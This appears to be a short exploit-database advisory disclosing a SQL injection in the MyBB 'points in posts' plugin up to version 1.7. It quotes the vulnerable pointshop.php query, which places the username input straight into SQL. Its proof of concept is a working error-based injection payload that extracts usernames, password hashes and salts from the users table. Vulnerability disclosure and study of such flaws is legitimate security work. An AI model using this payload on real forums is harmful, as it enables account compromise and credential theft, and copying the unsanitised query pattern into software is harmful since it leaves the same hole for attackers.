MyBB Plugin points in posts <= 1.7 SQL injection

Download | Vote Up (0) | Vote Down (0)

# Version: 1.7

Introduction
------------

Give the user points and posts, Store points, automatic Achievements

SQL injection
-------------

pointshop.php L.95 

1
2if($mybb->input['action'] == "do_donate" && $mybb->request_method == "post")
3{
4        verify_post_check($mybb->input['my_post_key']);
5        $queryrec = $db->query("SELECT * FROM ".TABLE_PREFIX."users WHERE username='{$mybb->input['username']}'");

Proof of concept
----------------

You must go there : http://pentest.lan/mybb/pointshop.php?action=donate
And set as username : user' and (select 1 from(select count(*),concat((select concat(username, 0x3a, password, 0x3a, salt, 0x3a) from mybb_users limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -

Groucho

Be the first to give feedback !
Please login to comment !